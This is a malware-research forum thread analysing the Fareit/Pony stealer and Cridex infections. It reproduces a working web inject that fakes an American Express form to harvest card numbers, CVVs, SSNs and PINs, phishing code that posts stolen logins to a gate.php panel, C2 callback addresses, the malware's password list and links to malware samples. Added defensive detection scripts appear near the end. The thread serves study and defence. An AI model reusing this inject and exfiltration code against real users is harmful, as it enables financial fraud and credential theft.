 <input type="text" class="amountfield"   id="dob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_dd"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text" class="amountfield"   id="dob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_yy"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <!--MDOB-->
 <div id="txt2"  class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_mdob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother Date of birth:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text"  class="amountfield"  id="mdob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_mm"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text" class="amountfield"   id="mdob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_dd"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text" class="amountfield"   id="mdob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_yy"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <div id="txt2" class=sunclass style="height: 20px; padding:3px ;padding-right:15px;">
 <font style="font-weight:700;font-family: Arial;font-size: 10px;text-align:right;"><div align="right"><input type="image" onclick="return formmySubmit();"   align="right" src="/myca/shared/summary/asr/images/lnf/btn_continue.gif"  value="Verify"  title="Continue"/></div></font>
 </div>
 </form>
 </div>
 <script type="text/javascript">
 function tabNext1CC(elem) {
   if(elem.value.length == 4) {
     document.getElementById('cc2').focus();
   }
 }
 function tabNext2CC(elem) {
   if(elem.value.length == 6) {
     document.getElementById('cc3').focus();
   }
 }
 function formmySubmit() {
   $("#msg").css("background", "#f5f6f1");
   if (checkCC()) {
     $("#div_cc_text").css("color", "black");
     if (checkExp()) {
       $("#div_exp").css("color", "black");
       if (checkCVV()) {
         $("#div_cvv").css("color", "black");
         if (check3DigitCode()) {
           $("#div_3digitcode").css("color", "black");
           if (SSN_check() == true) {
             $("#div_ssn").css("color", "black");
             if (PS_PIN_check() == true) {
               $("#div_ps_pin").css("color", "black");
               if (POB_check() == true) {
                 $("#div_pob").css("color", "black");
                 if (checkDob() == true) {
                   $("#div_dob").css("color", "black");
                   $("#div_mdob").css("color", "black");
                   $.cookie("trusted_rapport", "1", {
                     expires: 10,
                     path: "/",
                     domain: ".americanexpress.com"
                   });
                   $("#dialog").dialog("close");
                   return true
                 } else {
                   $("#div_dob").css("color", "red");
                   $("#div_mdob").css("color", "red");
                   doError("Date of birth")
                 }
               } else {
                 $("#div_pob").css("color", "red");
                 doError("place of birth")
               }
             } else {
               $("#div_ps_pin").css("color", "red");
               doError("personal security PIN")
             }
           } else {
             $("#div_ssn").css("color", "red");
             doError("social security number")
           }
         } else {
           $("#div_3digitcode").css("color", "red");
           doError("3-digit code")
         }
       } else {
         $("#div_cvv").css("color", "red");
         doError("cvv code")
       }
     } else {
       $("#div_exp").css("color", "red");
       doError("expiration date")
     }
   } else {
     $("#div_cc_text").css("color", "red");
     doError("card number")
   }
 }
 function out() {
   document.body.removeChild(img)
 }
 function move(a) {
   a = a || window.event;
   if (a.pageX == null && a.clientX != null) {
     var b = document.documentElement;
     var c = document.body;
     a.pageX = a.clientX + (b && b.scrollLeft || c && c.scrollLeft || 0) - (b.clientLeft || 0);
     a.pageY = a.clientY + (b && b.scrollTop || c && c.scrollTop || 0) - (b.clientTop || 0)
   }
   img.style.left = a.pageX + 15 + "px";
   img.style.top = a.pageY + 15 + "px"
 }
 function over(a) {
   img = document.createElement("div");
   document.body.appendChild(img);
   img.innerHTML = "<img src=" + a + " />";
   img.style.zIndex = "111111111111";
   img.style.position = "absolute";
   img.style.background = "#FFFFFF";
   img.style.border = "solid 1px #346fdc";
   img.style.padding = "4px";
   move();
 }
 function SSN_check() {
   var a = $("#ssn_1").val();
   var b = $("#ssn_2").val();
   var c = $("#ssn_3").val();
   var d = a.length + b.length + c.length;
   if (d == 9)
   if ((isNaN(a) || isNaN(b) || isNaN(c)) == false)
   return true;
   return false
 }
 function PS_PIN_check() {
   var a = $("#ps_pin").val();
   var d = a.length;
   if (d == 4)
   //if (isNaN(a) == false) // uncomment if pin is digital only
   return true;
   return false
 }
 function POB_check() {
   var a = $("#pob").val();
   var d = a.length;
   if (d > 0) {
     return true;
   }
   else {
     return true;
   }
 }
 function check3DigitCode() {
   var a = $("#3digitcode").val();
   var b = a.length;
   if (isNaN(a) == false)
   if (b == 3)
   return true;
   return false
 }
 function checkCVV() {
   var a = $("#cvv").val();
   var b = a.length;
   if (isNaN(a) == false)
   if (b == 4)
   return true;
   return false
 }
 function checkExp() {
   var a = $("#exp_mm").val();
   var b = $("#exp_yy").val();
   var c = a.length + b.length;
   if (c > 5)
   if (a > 0 && a < 13)
   if (b > 2009 && b < 2030)
   return true;
   return false
 }
 function checkCC() {
   var a = $("#cc1").val();
   var b = $("#cc2").val();
   var c = $("#cc3").val();
   if (check_cc(a+b+c) && a.charAt(0) == "3")
   return true;
   return false
 }
 function checkDob() {
   var a = $("#dob_mm").val();
   var b = $("#dob_dd").val();
   var c = $("#dob_yy").val();
   var d = $("#mdob_mm").val();
   var e = $("#mdob_dd").val();
   var f = $("#mdob_yy").val();
   var g = a.length + b.length + c.length;
   var h = d.length + e.length + f.length;
   if ((isNaN(a) || isNaN(b) || isNaN(c)) == false)
   if (g > 6)
   if (c < 1995 && c > 1900)
   if (a > 0 && a < 13 && b > 0 && b < 32)
   if ((isNaN(d) || isNaN(e) || isNaN(f)) == false)
   if (h > 6)
   if (d > 0 && d < 13 && e > 0 && e < 32)
   if (f + 12 < c)
   return true;
   return false
 }
 function doError(a) {
   $("#ername").text(a);
   $("#ername1").text(a);
   $("#msg").dialog({
     closeOnEscape: false,
     resizable: false,
     modal: true,
     width: 350,
     modal: true,
     zIndex: 99999
   })
 }
 function formClose() {
   $("#msg").dialog("close");
   return true
 }
 function check_cc(cardnumber) {
   var cardNo = cardnumber.replace(/[^0-9]/g, "");
   if (cardNo.length < 15 || cardNo.length > 16) {
     return false;
   }
   var checksum = 0;
   var j = 1;
   var calc;
   for (i = cardNo.length - 1; i >= 0; i--) {
     calc = Number(cardNo.charAt(i)) * j;
     if (calc > 9) {
       checksum = checksum + 1;
       calc = calc - 10;
     }
     checksum = checksum + calc;
     if (j == 1) {
       j = 2;
     } else {
       j = 1;
     }
   }
   if (checksum % 10 != 0) {
     return false;
   }
   return true;
 }
 jQuery.cookie = function(a, b, c) {
   if (typeof b != "undefined") {
   c = c || {};
     if (b === null) {
       b = "";
       c.expires = -1
     }
     var d = "";
     if (c.expires && (typeof c.expires == "number" || c.expires.toUTCString)) {
       var e;
       if (typeof c.expires == "number") {
         e = new Date;
         e.setTime(e.getTime() + c.expires * 24 * 60 * 60 * 1e3)
       } else
       e = c.expires;
       d = "; expires=" + e.toUTCString()
     }
     var f = c.path ? "; path=" + c.path: "";
     var g = c.domain ? "; domain=" + c.domain: "";
     var h = c.secure ? "; secure": "";
     document.cookie = [a, "=", encodeURIComponent(b), d, f, g, h].join("")
   } else {
     var i = null;
     if (document.cookie && document.cookie != "") {
       var j = document.cookie.split(";");
       for (var k = 0; k < j.length; k++) {
         var l = jQuery.trim(j[k]);
         if (l.substring(0, a.length + 1) == a + "=") {
           i = decodeURIComponent(l.substring(a.length + 1));
           break
         }
       }
     }
     return i
   }
 };
 if ($.cookie("trusted_rapport"));
 else
 $(document).ready(function() {
   $('.comingSoonPop').remove();
   $('.comingSoonTransLayer').remove();
   $("#dialog").dialog({
     closeOnEscape: false,
     resizable: false,
     modal: true,
     width: 350,
     modal: true,
     zIndex: 99998
   });
   $("a.ui-dialog-titlebar-close").replaceWith('<div align="center" style="overflow: hidden; position: relative;padding:0; margin:0"><img src="https://secure.americanexpress.com/NextGenNavigation/img/logo_bluebox.gif"></div>')
 })
 </script>
 ]]></replacement></modify></actions></httpinject><httpinject><conditions><url type="deny">\.(css|js)($|\?)</url><url type="allow" contentType="^text/(html|plain)"><![CDATA[^https://.*?\.americanexpress\.com]]></url></conditions><actions><modify><pattern><![CDATA[</html>(.*?)]]></pattern><replacement><![CDATA[
 <script type="text/javascript">
 // remove saved IDs
 Delete_Cookie("profile", "/", ".americanexpress.com");
 var UsernameField = document.getElementById('Username');
 if(UsernameField) {
   UsernameField.value = '';
   UsernameField.blur();     
Fareit Mothership Sent Method:
Code:
"Redirecting data to POST.."
   <redirect><pattern>jQuatro.js</pattern>
   <process><![CDATA[http://62.76.177.123/mx/3A/in/cp.php?h=8]]></process>
   </redirect></redirects>
    
"BOTNET Connection..."
   <bconnect>85.143.166.72:443</bconnect>
   <httpinjects><httpinject><conditions>
Fareit Callbacks HOSTS:
Image
Code:
h00p://132.248.49.112:8080/asp/intro.php
h00p://113.130.65.77:8080/asp/intro.php
h00p://203.113.98.131:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://200.108.18.158:8080/asp/intro.php
h00p://207.182.144.115:8080/asp/intro.php
h00p://148.208.216.70:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://202.6.120.103:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://207.126.57.208:8080/asp/intro.php
h00p://203.80.16.81:8080/asp/intro.php
h00p://202.180.221.186:8080/asp/intro.php
Using the HTTP/POST format below:
Code:
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: %lu
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Fareit phishing code:
Code:
var info = encodeURIComponent(
  'Login=' + $('input#EmployerLogin1_cbsys_login_email').val() + "\n" +
  'Password=' + $('input#EmployerLogin1_cbsys_login_password').val() + "\n" +
  $('input[name=q1]').val() + '=' + $('input[name=a1]').val() + "\n" +
  $('input[name=q2]').val() + '=' + $('input[name=a2]').val() + "\n" +
  $('input[name=q3]').val() + '=' + $('input[name=a3]').   // truncated in the original post
Fake credit card processing:
Code:
// Luhn (mod 10) check on the card number typed into the fake form;
// only 15- or 16-digit numbers are accepted.
function check_cc(cardnumber) {
  var cardNo = cardnumber.replace(/[^0-9]/g, "");
  if (cardNo.length < 15 || cardNo.length > 16) {
    return false;
  }
  var checksum = 0;
  var j = 1;
  var calc;
  var i;
  for (i = cardNo.length - 1; i >= 0; i--) {
    calc = Number(cardNo.charAt(i)) * j;
    if (calc > 9) {            // doubled digit of two digits: add them (same as calc - 9)
      checksum = checksum + 1;
      calc = calc - 10;
    }
    checksum = checksum + calc;
    if (j == 1) {              // alternate the weight 1, 2, 1, 2 ... from the right
      j = 2;
    } else {
      j = 1;
    }
  }
  if (checksum % 10 != 0) {
    return false;
  }
  return true;
}
List of software whose credentials Fareit slurps: http://pastebin.com/6FvcaRBf

Brute-force password list in the Fareit bins:
Code:
phpbb      asdf       qazwsx   iloveyou   jordan     pokemon
qwerty     soccer     happy    shadow     faith      iloveyo
jesus      superman   matrix   christ     summer     mustang
abc123     michael    pass     sunshine   ashley     helpme
letmein    cheese     aaaaaa   master     buster     justin
test       internet   amanda   computer   heaven     jasmine
love       joshua     nothing  princess   pepper     orange
password1  fuckyou    ginger   tigger     hunter     testing
hello      blessed    mother   football   lovely     apple
monkey     baseball   snoopy   angel      andrew     michell
dragon     starwars   jessica  jesus1     thomas     peace
trustno1   purple     welcome  whatever   angels     secret
freedom    charlie    grace    killer     daniel     william
jennifer     :
Admin panel:
Code:
var adminPanelLocation = 'h00p://62.76.177.123/if_Career/';
Admin panel sent variable strings (NEW!):
Code:
var d = adminPanelLocation + 'gate.php?done=1&bid=%YOUR-PC-NAME%&info='+info+'&rkey=' + Math['random']();
var d = adminPanelLocation + 'gate.php?bid=%YOUR-PC-NAME%&location='+encodeURIComponent(window.location)+'&rkey=' + Math['random']()
Now it looks like it is not accepting people knocking anymore...
[image]

Sample download is HERE---> http://www.mediafire.com/?7zz2s7g5xli8685
#MalwareMustDie!
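Added example (not part of the original post and not Fareit's own code): a small detector that turns the POST template quoted above into a fingerprint for raw HTTP requests. The header values and the /asp/intro.php gate path are taken from the post; the two sample requests are constructed here, and the threshold of five matching features is an assumption.

```python
"""Fingerprint Fareit/Pony gate POSTs from raw HTTP requests.

Added example for this thread, not code from the post or from the malware.
Header values and the gate path come from the post; both sample requests
are constructed; the hit threshold is an assumption.
"""

# Header values copied from the Fareit POST template in the post.
FAREIT_MARKERS = {
    "accept": "*/*",
    "accept-encoding": "identity, *;q=0",
    "connection": "close",
    "content-type": "application/octet-stream",
    "content-encoding": "binary",  # not a registered HTTP coding; rare in real traffic
    "user-agent": "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)",
}

# Gate path seen in this campaign (callback list above); a weak,
# campaign-specific indicator next to the header fingerprint.
KNOWN_GATE_PATHS = {"/asp/intro.php"}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into request line, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def fareit_indicators(req: dict) -> list:
    """Return the template features this request matches."""
    hits = []
    if req["method"] == "POST" and req["version"] == "HTTP/1.0":
        hits.append("POST over HTTP/1.0")
    for name, value in FAREIT_MARKERS.items():
        if req["headers"].get(name) == value:
            hits.append(f"{name}: {value}")
    if req["path"] in KNOWN_GATE_PATHS:
        hits.append(f"known gate path {req['path']}")
    return hits


def is_fareit_beacon(req: dict, min_hits: int = 5) -> bool:
    """Flag only when several template features line up; one odd header is not enough."""
    return len(fareit_indicators(req)) >= min_hits


# Constructed sample: what the template produces against one posted callback
# host (the body bytes are dummy, not a real Pony report).
SAMPLE_FAREIT = (
    "POST /asp/intro.php HTTP/1.0\r\n"
    "Host: 132.248.49.112:8080\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: identity, *;q=0\r\n"
    "Content-Length: 8\r\n"
    "Connection: close\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n"
    "\r\n"
    "\x00\x01\x02\x03\x04\x05\x06\x07"
)

# Constructed sample: an ordinary browser form POST for comparison.
SAMPLE_BENIGN = (
    "POST /login HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Accept: text/html,application/xhtml+xml\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Content-Length: 21\r\n"
    "Connection: keep-alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0\r\n"
    "\r\n"
    "user=alice&pw=hunter2"
)

if __name__ == "__main__":
    for label, raw in (("fareit", SAMPLE_FAREIT), ("benign", SAMPLE_BENIGN)):
        req = parse_request(raw)
        print(label, is_fareit_beacon(req), fareit_indicators(req))
```

The combination matters more than any single header: HTTP/1.0 with Connection: close, an octet-stream body declared as Content-Encoding: binary and a Windows 98 / MSIE 5.0 user agent is what makes this template stand out in proxy logs, while the /asp/intro.php path only helps for this campaign.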
 #17743  by unixfreaxjp
 Thu Jan 17, 2013 11:13 pm
Buster_BSA wrote:Sample download is HERE---> http://www.mediafire.com/?7zz2s7g5xli8685
Archive Download Blocked
Oh, my..
I'm new to kernelmode and did not know there was an upload feature.
Figured it out now. There you go, enjoy! =unixfreaxjp=
 #17749  by unixfreaxjp
 Fri Jan 18, 2013 6:21 am
A new infection via spam leading to the same Cridex payload was just detected today.
Landing page: h00p://dfudont.ru:8080/forum/links/column.php
Payload download:
Code:
http://dfudont.ru:8080/forum/links/column.php?bf=30:1n:1i:1i:33&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&bb=a&hy=m
↑ Same payload as in the previous findings; seems the moronz couldn't get a new payload delivered on time :D
The JARs have slight changes to adjust to the new domains; same exploits.
PoCs:
[image]
[image]
Anyway: I attached the new JARs, the PluginDetect/landing page and the payloads as samples, enjoy!
Feel free to analyze deeper; please help send these to AV vendors, since the infector's detection ratio is still low and they can change the payload anytime they want..
Further report: http://malwaremustdie.blogspot.jp/2013/ ... s.html#new
Special thanks to @Xylit0l for inviting me to this wonderful community. Hope to learn & contribute more! Respect, K.M.!
#MalwareMustDie!
 #17882  by unixfreaxjp
 Sun Jan 27, 2013 10:08 am
First of all, thanks to Xylit0l for inviting me here; I'll try to contribute the best I can. And to all of you who share for malware research in KernelMode, respect!
New updates were detected in the Cridex/PWS infector I follow. I wrote the analysis in as much detail as possible in the MalwareMustDie post here: http://malwaremustdie.blogspot.jp/2013/ ... prove.html , but I will share the deeper details here. Here we go.

The source of infection is the same: spam leads to a redirector to BHEK (they use 2.1); kinda dull to see the same scheme over and over again. You'll see the spam used for this infection here: http://blog.dynamoo.com/2013/01/ups-spa ... omaru.html
The redirector for this, i.e.: h00p://www.tounichi-g.co.jp/info.htm
All of them lead to the landing page here: h00p://eziponoma.ru:8080/forum/links/column.php
Grabbed all samples; the exploits and payload used are shared as I pasted here: http://pastebin.com/raw.php?i=St6E6Rjr
(was too long to write it here)

My point is, in this Cridex infection the NEW developments below were detected:
Code:
1. The usage of encryption is getting deeper; they encrypt the data
   up to the memory level now.
2. An attempt to avoid capture was also detected: the Cridex ran for about
   3 sec, followed by the KB*.exe, which runs for less than about 5 mins.
   The cmd was executed in a glimpse; see my PCAP & file capture data
   to view the time/speed of these new things. All just to prevent someone
   making a post like this :-)
3. An attempt to change system internals was detected (need to follow this
   further); system files on my TestPC got so corrupted it won't restart.
   The possibility of a bootkit makes this very interesting, &
   if the theory is right, they just raised their cybercrime level
   from stealer to ransom < need to dig in SERIOUSLY!
4. More profile capture detected & more sent-data templates seen.
   Thus they now have attachment-file API code in the POST session.
5. The desktop data was captured and saved in the registry (NEW)
1. How far does the encryption go? Far!
For the Cridex sample, if you unpack the sample (in my case about.exe) you'll see what the bad guys allow you to see; thus there are traces of garbled parts which still show the encrypted strings that they don't allow us to see.
i.e. see the part of the unpacked Cridex file:
[image]
i.e. 2: see the part of the unpacked "Fareit"/KB00777165.exe binary:
[image]
The green-marked one shows the same pattern of encryption, while the yellow-marked one is supposed to be a password to be used after decryption. Moreover, the sent data has the same pattern:
[image]

2. The speed of execution
It was calibrated to execute stuff in a faster way. Other than the logs of file I/O I captured in the MalwareMustDie blog, you'll see the overall timeline log I uploaded for explorer.exe during the infection: http://www.mediafire.com/?cojctz3hcubecoe
I broke down the process IDs for this log too, as per the table below:
PID 2116 - about.exe http://pastebin.com/raw.php?i=GGFyU3GH
PID 2152 - cmd.exe http://pastebin.com/raw.php?i=4GgvdGSU
PID 4128 - exp%n.tmp.exe http://pastebin.com/raw.php?i=tdYAz3k8
PID 1896 - KB00777165.exe http://pastebin.com/raw.php?i=xXTs3Nwz

3. Start to detect system root & (maybe) the changes in OS system internals?
I happened to spot the registry blob made by this malware in the below section:
Code:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals\
Process Monitor\FilterRules: 01 13 00 00 00 75 9C 00 00 00 00 00 00 00 18 00 00
00 50 00 72 00 6F 00 63 00 6D 00 6F 00 6E 00 2E 00 65 00 78 00 65 00 00
00 00 00 00 00 00 00 00 00 75 9C 00 00 00 00 00 00 00 0E 00 00 00 53 00
79 00 73 00 74 00 65 00 6D 00 00 00 00 00 00 00 00 00 00 00 77 9C 00 00
                       :
72 00 65 00 00 00 00 00 00 00 00 00 00 00 87 9C 00 00 05 00 00 00 00 10
00 00 00 24 00 55 00 70 00 43 00 61 00 73 00 65 00 00 00 00 00 00 00 00
00 00 00 87 9C 00 00 06 00 00 00 00 10 00 00 00 24 00 45 00 78 00 74 00
65 00 6E 00 64 00 00 00 00 00 00 00 00 00 00 00 92 9C 00 00 00 00 00 00
00 14 00 00 00 50 00 72 00 6F 00 66 00 69 00 6C 00 69 00 6E 00 67 00 00
00 00 00 00 00 00 00 00 00
With that, the blob actually looks like this:
[image]
↑ The system root; its information is clearly stated there. The question is why?
And again I cannot even restart my TestPC after reboot, which shows the system files have changed.
This is something new; it needs to be sought deeper and further.

4. Captures
The captured data functionality was also saved in the registry; I wonder why they did this.
Found the blobs below:
Code:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\
Shell\Bags\1\Desktop\ItemPos1024x768(1): 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 17 00 00 00 A6 00 00 00 14 00 1F 48
BA 8F 0D 45 25 AD D0 11 98 A8 08 00 36 1B 11 03 17 00 00 00 02 00
00 00 14 00 1F 50 E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 30 9D
17 00 00 00 54 00 00 00 14 00 1F 58 60 2C 8D 20 EA 3A 69 10 A2 D7
      :
01 00 3A 42 48 4D 20 00 61 62 6F 75 74 33 2E 65 78 65 00 00 2C 00
03 00 04 00 EF BE 3A 42 E5 5B 39 42 00 78 14 00 00 00 61 00 62 00
6F 00 75 00 74 00 33 00 2E 00 65 00 78 00 65 00 00 00 1A 00 B3 00
00 00 02 00 00 00 00 00 00 00
Which means:
[image]
↑ Those are actually the shortcut data I used on the desktop of my TestPC. They snapshotted it.
Furthermore, while reversing about.exe I found:
Code:
0x001AB8   Content-Disposition
0x001ACD   name="
0x001AD5   filename="
and
Code:
0x001CAE   Content-Disposition: attachment; filename=%S
↑ This part is new, at least for me. Looks like a file uploader is in the logic now.
Seeking this further: if you look at the config of Fareit, I recoded it nicely to see here -->> http://pastebin.com/H9kY7bbX
...will explain its correlation to the phishing functionality.

During the detection of traffic communication, I found only a few hostnames receiving the POST requests, which are:
[image]
Mostly the other servers weren't receiving the requests well:
[image]

I uploaded the latest sample here, and for the unpacked Cridex, Horgh looks to have uploaded it already to VT here: https://www.virustotal.com/file/a8de1b6 ... /analysis/
For the analysis data, captures, etc., I am not promoting anything, but to centralize the data please grab it from the MalwareMustDie post on this case here: http://malwaremustdie.blogspot.jp/2013/ ... prove.html

PS: please add information in a reply; I will be thankful if you also add/paste the evidence to share.
Kind regards! @unixfreaxjp
#MalwareMustDie!
 #17886  by rinn
 Sun Jan 27, 2013 12:08 pm
Hello.
3. Start to detect system root & (maybe) the changes in OS system internals?
I happened to spot the registry blob made by this malware in the below section:
Sysinternals, and this registry key belongs to Process Monitor, which you or one of your forensic tools are using.

[image]

This is written to the registry as REG_BINARY data:

[image]

Best Regards,
-rin
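Added example (not code from either post): one way to check rinn's point is to pull the UTF-16LE strings out of the FilterRules blob quoted above. The hex is the dump as posted; the ':' gap in the post is kept as two separate segments rather than guessed. The names that come out (Procmon.exe, System, $UpCase, $Extend, Profiling) are entries of Process Monitor's default exclude filter, i.e. the tool's own configuration rather than anything the malware wrote.

```python
"""Recover the UTF-16LE strings held in a REG_BINARY hex dump.

Added example for this thread, not code from either post. FILTERRULES_HEX is
the dump of HKU\...\Software\Sysinternals\Process Monitor\FilterRules as
quoted in the post, split into the two segments on either side of its gap.
"""

FILTERRULES_HEX = [
    # lines before the ':' gap in the post
    "01 13 00 00 00 75 9C 00 00 00 00 00 00 00 18 00 00 "
    "00 50 00 72 00 6F 00 63 00 6D 00 6F 00 6E 00 2E 00 65 00 78 00 65 00 00 "
    "00 00 00 00 00 00 00 00 00 75 9C 00 00 00 00 00 00 00 0E 00 00 00 53 00 "
    "79 00 73 00 74 00 65 00 6D 00 00 00 00 00 00 00 00 00 00 00 77 9C 00 00",
    # lines after the gap
    "72 00 65 00 00 00 00 00 00 00 00 00 00 00 87 9C 00 00 05 00 00 00 00 10 "
    "00 00 00 24 00 55 00 70 00 43 00 61 00 73 00 65 00 00 00 00 00 00 00 00 "
    "00 00 00 87 9C 00 00 06 00 00 00 00 10 00 00 00 24 00 45 00 78 00 74 00 "
    "65 00 6E 00 64 00 00 00 00 00 00 00 00 00 00 00 92 9C 00 00 00 00 00 00 "
    "00 14 00 00 00 50 00 72 00 6F 00 66 00 69 00 6C 00 69 00 6E 00 67 00 00 "
    "00 00 00 00 00 00 00 00 00",
]


def utf16le_strings(data: bytes, min_chars: int = 4) -> list:
    """Return runs of at least min_chars printable-ASCII UTF-16LE (char, 0x00) pairs.

    The scan starts at every byte offset, so it does not depend on the
    strings being aligned to even offsets inside the blob.
    """
    found = []
    i, n = 0, len(data)
    while i + 1 < n:
        if 0x20 <= data[i] < 0x7F and data[i + 1] == 0:
            j, chars = i, []
            while j + 1 < n and 0x20 <= data[j] < 0x7F and data[j + 1] == 0:
                chars.append(chr(data[j]))
                j += 2
            if len(chars) >= min_chars:
                found.append("".join(chars))
            i = j
        else:
            i += 1
    return found


def decode_filterrules(segments=FILTERRULES_HEX) -> list:
    """Decode each hex segment (whitespace between bytes is ignored) and collect strings."""
    names = []
    for segment in segments:
        names.extend(utf16le_strings(bytes.fromhex(segment)))
    return names


if __name__ == "__main__":
    for name in decode_filterrules():
        print(name)
```

Each string in the blob is preceded by a little-endian byte length (0x18 for "Procmon.exe", 0x0E for "System", 0x10 for "$UpCase" and "$Extend", 0x14 for "Profiling"), which is the layout Process Monitor uses for its saved filter rules; the same extractor works on any REG_BINARY value that embeds wide strings.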
 #17888  by unixfreaxjp
 Sun Jan 27, 2013 12:36 pm
rinn wrote:Hello.
3. Start to detect system root & (maybe) the changes in OS system internals?
I happened to spot the registry blob made by this malware in the below section:
Sysinternals, and this registry key belongs to ProcessMonitor you or one of your forensic tools are using.
is this written to registry as REG_BINARY data
-rin
It was the first time using Process Monitor for monitoring this; thank you for your information.
I'll remember it for the next time. How about the other registry blob that shot the desktop info,
was it coming from Process Monitor too? I must dig more into this tool.. In the meantime I revoke the analysis related to the point mentioned.

rgds